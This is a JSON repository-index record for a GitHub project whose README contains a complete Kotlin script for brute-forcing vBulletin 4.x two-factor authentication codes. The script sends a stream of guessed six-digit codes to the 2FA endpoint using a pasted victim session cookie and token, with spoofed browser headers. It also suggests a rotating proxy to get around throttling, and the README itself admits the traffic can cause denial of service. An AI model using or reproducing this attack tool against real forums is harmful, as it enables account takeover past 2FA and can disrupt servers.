{"id":18811765,"url":"https://github.com/jetkai/vbulletin-2fa-bruteforce","last_synced_at":"2026-01-11T14:30:20.065Z","repository":{"id":109394710,"uuid":"492109240","full_name":"jetkai/vbulletin-2fa-bruteforce","owner":"jetkai","description":"Example Kotlin Script on bruteforcing 2FA for vBulletin 4.x ‼️ Warning: Higher requests can cause database issues/DoS ‼️","archived":false,"fork":false,"pushed_at":"2022-05-14T04:38:15.000Z","size":12,"stargazers_count":2,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2024-12-30T00:13:30.137Z","etag":null,"topics":["2fa","bruteforce","bruteforcing","jdk11","jdk8","kotlin","mfa","vbulletin4"],"latest_commit_sha":null,"homepage":"","language":"Kotlin","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/jetkai.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2022-05-14T04:13:10.000Z","updated_at":"2023-08-08T01:45:07.000Z","dependencies_parsed_at":null,"dependency_job_id":"b46f8e88-7592-438d-8329-3b9af51d2285","html_url":"https://github.com/jetkai/vbulletin-2fa-bruteforce","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jetkai%2Fvbulletin-2fa-bruteforce","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jetkai%2Fvbulletin-2fa-bruteforce/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jetkai%2Fvbulletin-2fa-bruteforce/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jetkai%2Fvbulletin-2fa-bruteforce/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jetkai","download_url":"https://codeload.github.com/jetkai/vbulletin-2fa-bruteforce/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":239748248,"owners_count":19690232,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["2fa","bruteforce","bruteforcing","jdk11","jdk8","kotlin","mfa","vbulletin4"],"created_at":"2024-11-07T23:27:36.167Z","updated_at":"2026-01-11T14:30:20.028Z","avatar_url":"https://github.com/jetkai.png","language":"Kotlin","funding_links":[],"categories":[],"sub_categories":[],"readme":"# vBulletin 2FA BruteForce\n#### Example Kotlin Script on bruteforcing 2FA for vBulletin 4.x\n‼️ Warning: Higher requests can cause database issues/DoS ‼️\n\nMinimum Requirements: \n---\n- ✅ IntelliJ 2020\n- ✅ JDK 8\n- ✅ Kotlin 1.5.0\n- ✅ Internet 🙂\n\n(Recommended: Rotating Proxy)\n\nScript:\n---\n```kotlin\nimport java.net.URI\nimport java.net.URLEncoder\nimport java.net.http.HttpClient\nimport java.net.http.HttpRequest\nimport java.net.http.HttpResponse\nimport java.security.SecureRandom\nimport java.time.Duration\nimport java.util.*\nimport java.util.concurrent.Callable\nimport java.util.concurrent.Executors\nimport java.util.concurrent.ScheduledExecutorService\nimport java.util.concurrent.TimeUnit\n\n/**\n * @author Kai\n * @version 1.0 -\u003e 14/05/2022 | NO-PROXY\n */\n\n//CAN EDIT - START\nconst val threads = 2\nconst val endpointURL = \"https://\u003cPASTE DOMAIN HERE\u003e/misc.php?do=twofactor\"\nconst val securityToken = \"\u003cPASTE TOKEN HERE\u003e\"\nconst val cookie = \"\u003cPASTE COOKIE HERE\u003e\"\n//CAN EDIT - END\n\n//Uncomment if using rotating proxy \u0026 comment out the \"val client\" below\n/*val client : HttpClient = HttpClient.newBuilder()\n    .proxy(ProxySelector.of(InetSocketAddress(\"rotate.proxy.example\", 4151)))\n    .version(HttpClient.Version.HTTP_1_1).build()*/\n\nval client : HttpClient = HttpClient.newBuilder().version(HttpClient.Version.HTTP_1_1).build()\nval builder : HttpRequest.Builder = vBulletinHeaders(HttpRequest.newBuilder())\n\nval responseData = ResponseData(mutableListOf(), mutableListOf())\n\nval twoFactorRandom = SecureRandom()\nval fastRandom = SplittableRandom()\n\nval executor : ScheduledExecutorService = Executors.newScheduledThreadPool(\n    Runtime.getRuntime().availableProcessors() + 1\n)\n\n/****************\n *   MAIN Fun   *\n ****************/\n\nfun main() {\n    val bruteForceCallable = Callable { handleResponse() }\n    val monitorCallable = Callable { monitor() }\n    repeat(threads) {\n        newTask(bruteForceCallable) //Creates thread that'll send the HTTPS request\n    }\n    newTask(monitorCallable) //Prints to console (total req)\n}\n\nfun handleResponse() {\n    val postRequest = post()\n    val twoFactor = postRequest.twoFactor\n    val response = postRequest.response\n\n    val body = response.body()\n    val code = response.statusCode()\n\n    val invalidTwoFactor = body.contains(\"Invalid authentication code.\") || code != 200\n    if(invalidTwoFactor) {\n        responseData.used2FA.add(twoFactor)\n        responseData.responseCodes.add(code)\n    } else {\n        print(\"\\rSleeping Thread-\" + Thread.currentThread().id)\n        Thread.sleep(10000L) //Wait 10 seconds, being throttled\n    }\n\n}\n\nfun monitor() {\n    if(responseData.used2FA.size \u003e 0 \u0026\u0026 responseData.responseCodes.size \u003e 0)\n        print(\"\\r[Monitor] ${responseData.used2FA.size} | ${responseData.responseCodes.last()}\")\n}\n\nfun request(next2FA : String) : HttpRequest {\n    val params = mapOf(\n        \"code\" to next2FA,\n        \"s\" to \"\",\n        \"securitytoken\" to securityToken,\n        \"do\" to \"twofactor\",\n        \"action\" to \"doverify\"\n    )\n    return builder.uri(URI.create(endpointURL)).POST(form(params)).timeout(Duration.ofSeconds(5)).build()\n}\n\nfun post() : ResponseHttp {\n    val next2FA = next2FA()\n    val response = client.sendAsync(request(next2FA), HttpResponse.BodyHandlers.ofString())\n    return ResponseHttp(next2FA, response[6, TimeUnit.SECONDS])\n}\n\nfun vBulletinHeaders(builder : HttpRequest.Builder) : HttpRequest.Builder {\n    builder.header(\n        \"accept\",\n        \"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\" +\n                \"*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\"\n    )\n    builder.header(\"accept-language\", \"en-US,en;q=0.9\")\n    builder.header(\"cache-control\", \"no-cache\")\n    builder.header(\"content-type\", \"application/x-www-form-urlencoded\")\n    builder.header(\"pragma\", \"no-cache\")\n    builder.header(\n        \"sec-ch-ua\",\n        \"\\\" Not A;Brand\\\";v=\\\"99\\\", \\\"Chromium\\\";v=\\\"101\\\", \\\"Google Chrome\\\";v=\\\"101\\\"\"\n    )\n    builder.header(\"sec-ch-ua-mobile\", \"?0\")\n    builder.header(\"sec-ch-ua-platform\", \"\\\"Windows\\\"\")\n    builder.header(\"sec-fetch-dest\", \"document\")\n    builder.header(\"sec-fetch-mode\", \"navigate\")\n    builder.header(\"sec-fetch-site\", \"same-origin\")\n    builder.header(\"sec-fetch-user\", \"?1\")\n    builder.header(\"upgrade-insecure-requests\", \"1\")\n    builder.header(\"cookie\", cookie)\n    builder.header(\"Referer\", endpointURL)\n    builder.header(\"Referrer-Policy\", \"strict-origin-when-cross-origin\")\n    return builder\n}\n\n/****************\n *  THREADING   *\n ****************/\n\nfun \u003cR\u003e newTask(callable : Callable\u003cR\u003e/*, callback : Callback\u003cR\u003e*/) {\n    executor.scheduleAtFixedRate( {\n        callable.call()\n    }, fastRandom(), fastRandom(), TimeUnit.MILLISECONDS)\n}\n\n/****************\n *     UTIL     *\n ****************/\n\nfun next2FA() : String = String.format(\"%06d\", twoFactorRandom.nextInt(999999))\n\nfun String.utf8() : String = URLEncoder.encode(this, \"UTF-8\")\n\nfun form(data : Map\u003cString, String\u003e) : HttpRequest.BodyPublisher =\n    HttpRequest.BodyPublishers.ofString(\n        data.map { (k, v) -\u003e \"${ (k.utf8()) }=${ v.utf8() }\" }.joinToString(\"\u0026\")\n    )\n\nfun fastRandom() = fastRandom.nextInt(250) + 200L\n\n/****************\n * DATA CLASSES *\n ****************/\n\ndata class ResponseHttp(val twoFactor : String, val response : HttpResponse\u003cString\u003e)\n\ndata class ResponseData(val used2FA : MutableList\u003cString\u003e, val responseCodes : MutableList\u003cInt\u003e)\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fjetkai%2Fvbulletin-2fa-bruteforce","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fjetkai%2Fvbulletin-2fa-bruteforce","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fjetkai%2Fvbulletin-2fa-bruteforce/lists"}